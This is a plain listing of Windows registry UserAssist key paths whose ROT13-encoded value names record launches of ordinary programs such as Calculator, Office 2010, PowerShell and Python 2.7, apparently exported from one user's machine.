HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Jbeq 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Rkpry 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bhgybbx 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg CbjreCbvag 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg BarAbgr 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqbor Ernqre 9.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Benpyr IZ IveghnyObk Thrfg Nqqvgvbaf\Havafgnyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong.pbz.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\Jvaqbjf Wbheany.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf CbjreFuryy Zbqhyrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Qvtvgny Pregvsvpngr sbe ION Cebwrpgf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Pyvc Betnavmre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr Cvpgher Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Bssvpr Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\VQYR (Clguba THV).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Zbqhyr Qbpf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Clguba (pbzznaq yvar).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong.pbz\Npebong.pbz.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
